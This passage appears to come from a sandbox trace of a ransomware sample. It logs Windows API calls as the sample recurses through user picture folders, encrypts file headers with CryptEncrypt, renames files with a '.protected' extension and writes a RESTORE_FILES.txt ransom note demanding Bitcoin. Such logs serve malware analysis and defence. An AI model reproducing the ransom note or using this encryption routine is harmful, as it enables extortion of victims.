(lpFirst="vqMP9d.jpg", lpSrch=".protected") returned 0x0 [0092.531] lstrcmpW (lpString1="vqMP9d.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0092.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vqmp9d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.532] StrStrW (lpFirst="vqMP9d.jpg", lpSrch=".txt") returned 0x0 [0092.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.532] StrStrW (lpFirst="vqMP9d.jpg", lpSrch=".rar") returned 0x0 [0092.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.532] StrStrW (lpFirst="vqMP9d.jpg", lpSrch=".zip") returned 0x0 [0092.532] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.533] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.533] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.533] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.533] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.533] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.533] CloseHandle (hObject=0xd8) returned 1 [0092.533] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg.protected") returned 88 [0092.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vqmp9d.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vqmp9d.jpg.protected")) returned 1 [0092.534] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.534] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.535] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\RESTORE_FILES.txt") returned 85 [0092.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.536] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.536] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.536] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.536] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.536] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.536] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.536] CloseHandle (hObject=0xd4) returned 1 [0092.537] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="Windows") returned -1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="Program Files") returned -1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="Program Files (x86)") returned -1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="$Recycle.bin") returned 1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="System Volume Information") returned -1 [0092.537] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.537] StrStrIW (lpFirst="FgnlkCw.png", lpSrch=".protected") returned 0x0 [0092.537] lstrcmpW (lpString1="FgnlkCw.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.537] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.537] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\fgnlkcw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.538] StrStrW (lpFirst="FgnlkCw.png", lpSrch=".txt") returned 0x0 [0092.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.538] StrStrW (lpFirst="FgnlkCw.png", lpSrch=".rar") returned 0x0 [0092.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.538] StrStrW (lpFirst="FgnlkCw.png", lpSrch=".zip") returned 0x0 [0092.538] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.538] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.538] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.539] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.539] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.539] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.539] CloseHandle (hObject=0xd4) returned 1 [0092.540] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png.protected") returned 69 [0092.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\fgnlkcw.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\fgnlkcw.png.protected")) returned 1 [0092.540] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.540] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="$Recycle.bin") returned 1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="System Volume Information") returned -1 [0092.541] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1") returned 60 [0092.541] lstrcmpW (lpString1="J1rYsPQmwZe1", lpString2=".") returned 1 [0092.541] lstrcmpW (lpString1="J1rYsPQmwZe1", lpString2="..") returned 1 [0092.541] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\*") returned 62 [0092.541] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.541] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.541] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.541] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\.") returned 62 [0092.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.541] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.541] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.541] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.541] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\..") returned 63 [0092.541] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.541] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.541] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="$Recycle.bin") returned 1 [0092.542] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="System Volume Information") returned -1 [0092.542] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 [0092.542] StrStrIW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".protected") returned 0x0 [0092.542] lstrcmpW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\7p_auaojtxtorv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 [0092.542] StrStrW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".txt") returned 0x0 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 [0092.542] StrStrW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".rar") returned 0x0 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 [0092.542] StrStrW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".zip") returned 0x0 [0092.542] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.543] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.543] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.543] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.543] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.543] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.544] CloseHandle (hObject=0xd8) returned 1 [0092.544] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp.protected") returned 89 [0092.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\7p_auaojtxtorv.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\7p_auaojtxtorv.bmp.protected")) returned 1 [0092.545] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.545] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.545] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\RESTORE_FILES.txt") returned 78 [0092.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.546] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.546] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.547] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.547] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.547] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.547] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.547] CloseHandle (hObject=0xd4) returned 1 [0092.547] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="Windows") returned -1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="Program Files") returned -1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="Program Files (x86)") returned -1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="$Recycle.bin") returned 1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="System Volume Information") returned -1 [0092.547] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.547] StrStrIW (lpFirst="mcdRZy3ZI.png", lpSrch=".protected") returned 0x0 [0092.547] lstrcmpW (lpString1="mcdRZy3ZI.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.547] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.547] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\mcdrzy3zi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 